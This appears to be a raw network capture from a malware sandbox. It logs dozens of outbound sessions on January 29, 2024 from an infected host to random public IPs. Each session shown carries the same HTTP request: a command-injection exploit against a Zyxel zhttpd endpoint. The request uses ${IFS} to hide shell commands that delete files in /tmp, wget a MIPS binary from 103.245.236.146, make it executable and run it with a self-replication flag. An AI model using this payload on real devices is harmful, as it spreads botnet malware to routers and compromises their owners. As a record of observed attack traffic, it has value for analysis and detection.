                                                Jan 29, 2024 07:07:22.924531937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                395192.168.2.233664892.128.95.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:22.924595118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                396192.168.2.2342790100.232.217.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:23.928348064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                397192.168.2.2352982181.35.184.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:23.928376913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                398192.168.2.234815490.53.114.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:23.928401947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                399192.168.2.2348088186.243.14.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:23.928519011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                400192.168.2.233944225.81.186.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:24.932549000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                401192.168.2.2348552113.101.226.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:24.932591915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                402192.168.2.2346788164.142.12.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:24.932651997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                403192.168.2.235021489.36.60.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:24.932720900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                404192.168.2.235645662.155.53.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:24.932831049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                405192.168.2.233434050.20.228.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:25.935698986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                406192.168.2.235197244.185.18.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:26.939752102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                407192.168.2.2351578207.206.37.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:26.939783096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                408192.168.2.236015231.86.205.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:26.939815044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                409192.168.2.234372466.153.229.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:26.939904928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                410192.168.2.2360196172.171.3.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:27.943783998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                411192.168.2.2351988162.177.252.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:27.943831921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                412192.168.2.2336134132.118.117.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:27.943860054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                413192.168.2.2358414121.208.219.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:27.943902016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                414192.168.2.2347288118.214.198.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:27.943962097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                415192.168.2.235161463.136.103.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:27.943975925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                416192.168.2.2344730123.226.216.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:27.944083929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                417192.168.2.2349016155.157.156.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.980593920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                418192.168.2.233479838.73.92.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.980634928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                419192.168.2.2344458195.79.47.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.980696917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                420192.168.2.23470161.184.47.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.980748892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                421192.168.2.2349930169.75.218.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.980776072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                422192.168.2.2357862183.141.49.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.980834007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                423192.168.2.2352782109.17.203.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.980892897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                424192.168.2.235934084.18.84.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.980902910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                425192.168.2.235314813.222.238.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.980935097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                426192.168.2.2354578171.118.253.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.980969906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                427192.168.2.2341950158.145.209.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981000900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                428192.168.2.233914291.167.227.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981065035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                429192.168.2.233467823.240.249.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981087923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                430192.168.2.235846217.86.185.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981138945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                431192.168.2.234275299.10.167.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981491089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                432192.168.2.2332862168.117.111.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981497049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                433192.168.2.233724471.217.241.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981520891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                434192.168.2.235503294.201.196.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981539965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                435192.168.2.2354958108.62.2.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981620073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                436192.168.2.2349746219.241.235.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981635094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                437192.168.2.2357226108.148.12.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981662035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                438192.168.2.2334938195.255.217.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981702089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                439192.168.2.233420213.102.255.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981770039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                440192.168.2.235559872.133.216.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981786013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                441192.168.2.234525024.9.168.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981836081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                442192.168.2.235758451.30.233.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981877089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                443192.168.2.2340696109.112.149.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981913090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                444192.168.2.2352666201.50.218.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981950998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                445192.168.2.233573219.87.144.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.981982946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                446192.168.2.23398685.245.29.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982038021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                447192.168.2.235534414.23.130.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982099056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                448192.168.2.235340813.137.46.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982136965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                449192.168.2.2338170140.206.239.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982178926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                450192.168.2.234482049.230.67.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982208967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                451192.168.2.2337980131.238.40.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982250929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                452192.168.2.234566441.198.116.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982291937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                453192.168.2.2348258142.161.140.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982321978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                454192.168.2.235364893.153.228.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982332945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                455192.168.2.235399445.4.79.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982383013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                456192.168.2.235898074.185.241.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982405901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                457192.168.2.234784083.103.128.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982450962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                458192.168.2.234121682.83.242.22443
                                                TimestampBytes transferredDirectionData
